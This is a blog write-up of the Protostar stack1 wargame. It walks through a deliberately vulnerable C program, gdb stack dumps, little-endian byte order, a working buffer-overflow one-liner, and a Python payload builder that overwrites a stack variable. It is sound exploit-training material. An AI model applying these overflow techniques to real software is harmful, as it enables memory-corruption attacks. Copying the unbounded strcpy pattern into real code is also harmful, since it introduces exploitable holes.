Depth of Code

Hani’s blog

exploit-exercises Protostar: Stack 1

Dec 9, 2012

This is the write-up for the stack1 challenge of Exploit-Exercises' Protostar wargame. The source code is provided as follows:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>    /* declares errx(); the original listing omits it and relies on an implicit declaration */

int main(int argc, char **argv)
{
  volatile int modified;   /* stored directly past the end of buffer, as the gdb dump below shows */
  char buffer[64];         /* no bounds check: an argv[1] longer than 64 bytes spills into modified */

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);   /* unbounded copy: this is the overflow */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Like the previous challenge, the task is to change the value of the modified variable. But this time we have to set it to a specific value: 0x61626364. Looking at the ASCII table, you will see that these four bytes are the letters:

0x61 => a, 0x62 => b, 0x63 => c, 0x64 => d

user@protostar:~/stack1$ gdb -q /opt/protostar/bin/stack1
Reading symbols from /opt/protostar/bin/stack1...done.
(gdb) run `python -c "print 'A'*64+'abcd'"`
Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`
Try again, you got 0x64636261

Program exited with code 036.

One small catch is that 'abcd' is read back as 'dcba'. Why is that? Because we are writing raw bytes into memory, and x86 is little endian: strcpy places 'a', 'b', 'c', 'd' at increasing addresses, and a little-endian 32-bit load treats the byte at the lowest address as the least significant one, so the word is read as 0x64636261. The breakpoint and stack dump below confirm that the four bytes land right after the 64 bytes of 'A' (0x41) that fill buffer.

(gdb) break 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) run `python -c "print 'A'*64+'abcd'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`

Breakpoint 1, main (argc=2, argv=0xbffff814) at stack1/stack1.c:18
18    in stack1/stack1.c
(gdb) x/30wx $esp
0xbffff700:    0xbffff71c        0xbffff94e        0xb7fff8f8       0xb7f0186e
0xbffff710:    0xb7fd7ff4       0xb7ec6165    0xbffff728        0x41414141
0xbffff720:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff730:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff740:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff750:    0x41414141    0x41414141    0x41414141    0x64636261
0xbffff760:    0x08048400    0x00000000    0xbffff7e8        0xb7eadc76
0xbffff770:    0x00000002    0xbffff814 

With that said, to solve this challenge we write the bytes in reverse order and use 'dcba' in our payload, so that the little-endian read yields exactly 0x61626364.

user@protostar:~$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'dcba'"`

you have correctly got the variable to the right value
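The byte-order rule above generalizes beyond the ASCII-friendly value 0x61626364: struct.pack with the "<" (little-endian) marker produces the right argv[1] bytes for any 32-bit target, and a small simulation of what strcpy leaves in modified shows why 'abcd' reads back as 0x64636261. This is an added example, not part of the original write-up; BUFFER_SIZE, build_payload and modified_after_strcpy are names chosen here, and the simulation assumes the stack layout seen in the gdb dump (modified immediately after the 64-byte buffer).

```python
import struct
import sys

BUFFER_SIZE = 64          # char buffer[64] in stack1.c
TARGET = 0x61626364       # value main() compares `modified` against


def build_payload(target, buffer_size=BUFFER_SIZE):
    """Return the argv[1] bytes that overwrite `modified` with `target`.

    The first buffer_size bytes fill `buffer`; the next four are the
    32-bit target in little-endian order, which is the order strcpy()
    must write them for an x86 load to read the intended value.
    """
    word = struct.pack("<I", target)
    # argv strings cannot carry a NUL byte and strcpy() stops at the first
    # one, so a target containing 0x00 cannot be delivered this way.
    if b"\x00" in word:
        raise ValueError("target 0x%08x contains a NUL byte" % target)
    return b"A" * buffer_size + word


def modified_after_strcpy(payload, buffer_size=BUFFER_SIZE):
    """Simulate the value of `modified` after strcpy(buffer, payload).

    Assumes the layout from the gdb dump: `modified` sits directly after
    the 64-byte buffer. It starts at 0 (modified = 0 before the copy), and
    strcpy() writes the overflow bytes plus a terminating NUL, so any byte
    the payload does not reach keeps its zero value.
    """
    payload = payload.split(b"\x00", 1)[0]          # strcpy stops at NUL
    overflow = payload[buffer_size:buffer_size + 4]
    word = (overflow + b"\x00" * 4)[:4]              # unreached bytes stay 0
    return struct.unpack("<I", word)[0]


if __name__ == "__main__":
    # Emit the raw payload, e.g.: ./stack1 "$(python3 this.py)"
    sys.stdout.buffer.write(build_payload(TARGET))
```

Feeding the naive 'abcd' ordering to modified_after_strcpy reproduces the 0x64636261 the first gdb run printed, while build_payload(TARGET) yields the 'dcba' ordering that passes the check.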